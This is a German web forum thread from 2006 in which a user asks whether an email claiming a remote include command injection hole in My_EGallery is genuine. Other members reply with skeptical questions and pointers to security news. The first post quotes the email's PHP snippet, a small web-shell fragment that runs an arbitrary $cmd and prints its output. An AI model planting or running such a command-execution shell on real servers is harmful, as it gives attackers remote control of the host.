Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
(Web-) Design und webbasierte Sprachen Tipps & Tricks, Designabgleich, HTML & Javascript, Flash, ASP, PHP, Perl/CGI...

Sicherheitslücke in My_EGallery ?

Diskussion: Sicherheitslücke in My_EGallery ? im Forum (Web-) Design und webbasierte Sprachen, in der Kategorie Web, Network & Multimedia Palace; Anzeige hi ich hab heute eine e-mail bekommen von jemandem der behauptet dass My_EGallery eine Sicherheitslücke hat. er hat gesagt, ...

Antwort
Alt 21.01.06, 21:05   #1 (permalink)
M-H
 
Registriert seit: 20.11.05
M-H Leistung: Facit NTK
Likes: 0
Standard Sicherheitslücke in My_EGallery ?

Anzeige

hi

ich hab heute eine e-mail bekommen von jemandem der behauptet dass My_EGallery eine Sicherheitslücke hat.

er hat gesagt, dass die lücke ein "Remote Include Command Injection" ist. und ich musste ne Update für den script von My_EGallery machen, oder den Fehler korrigieren.

Code:
> <?
>   // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
>   if (isset($chdir)) @chdir($chdir);
>   ob_start();
>   execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");

>   $output = ob_get_contents();
>   ob_end_clean();
>   print_output();
> ?>
soll ich mir Sorgen machen? gibt's diesen Fehler wirklich? :-\

Danke schon mal für die Antwort !
M-H ist offline   Mit Zitat antworten
Alt 22.01.06, 12:19   #2 (permalink)
 
Benutzerbild von BasicAvid
 
Registriert seit: 17.03.04
BasicAvid Leistung: Facit NTK
Likes: 2
Standard

Hallo,

es gibt Sicherheitslücken bei My_EGallery, aber diese, habe ich nicht gefunden. Der Code den Du gepostet hast, ist das der Code den Du einbauen solltest?
Kennst Du die Person die Dir die EMail-Adresse gesendet hast?

Schau doch mal bei Heise-Security vorbei!
__________________
Mfg Basic Avid
- Use it or be used! -
BasicAvid ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 22.01.06, 13:42   #3 (permalink)
M-H
Themenstarter
 
Registriert seit: 20.11.05
M-H Leistung: Facit NTK
Likes: 0
Standard

danke BasicAvid für die Antwort.

die Sache ist schon gereglt. ich hab in einem nuke-forum gefragt. die sagen dass das Fehler seit 2 Jahren nicht mehr gibt.


ich wusste auch nicht, was ich mit dem Code machen soll

und die Person die mir die e-mail gesendet hat, hat sich als "white Hacker" vorgestellt.

M-H ist offline   Mit Zitat antworten
Alt 22.01.06, 13:46   #4 (permalink)
Administrator
 
Benutzerbild von Mackz
 
Registriert seit: 02.10.01
Mackz Leistung: Pentium IMackz Leistung: Pentium I
Likes: 30
Standard

Zitat:
Original von M-H
die Sache ist schon gereglt. ich hab in einem nuke-forum gefragt. die sagen dass das Fehler seit 2 Jahren nicht mehr gibt.
Du verwendest aber nicht vielleicht eine 2 Jahre alte Version!?
__________________
RL sux big time... auch 2012!

Deleting pr0n is like killing your best friend

[HaBo] bei Facebook - Werde Fan
Mackz ist offline   Mit Zitat antworten
Alt 22.01.06, 15:02   #5 (permalink)
M-H
Themenstarter
 
Registriert seit: 20.11.05
M-H Leistung: Facit NTK
Likes: 0
Standard

ich hoffe, dass das nicht der Fall ist


ich hab erst vor 6 Monate meine My_EGallery installiert, ich denke, die war die actuelle Version
M-H ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Web, Network & Multimedia Palace » (Web-) Design und webbasierte Sprachen » Sicherheitslücke in My_EGallery ?
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
sicherheitslücke in norton? obispo (In)security allgemein 6 01.11.05 22:35
Potentielle Sicherheitslücke in Mac OS 10.4 mise Mac OS & Co. 4 11.05.05 19:51
Sicherheitslücke fux0red Virenschutz · Tools & Aggressive Software 15 23.05.04 00:02
Sicherheitslücke in PGP Tec News & Ankündigungen 0 07.09.02 03:39


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61